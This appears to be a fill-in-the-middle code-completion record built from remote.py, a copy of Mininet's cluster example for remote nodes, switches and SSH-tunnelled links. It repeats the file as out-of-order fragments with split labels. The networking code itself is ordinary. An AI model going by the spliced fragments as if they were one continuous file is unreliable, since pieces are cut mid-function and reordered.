"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None,
controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node
server: remote server (optional)
user: user on remote server (optional)
controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
"Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs)
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class RemoteHost(RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
|
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs)
| if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result)) | conditional_block |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None, | server: remote server (optional)
user: user on remote server (optional)
controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
"Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs)
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class RemoteHost(RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result))
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs) | controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node | random_line_split |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None,
controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node
server: remote server (optional)
user: user on remote server (optional)
controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
|
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class RemoteHost(RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
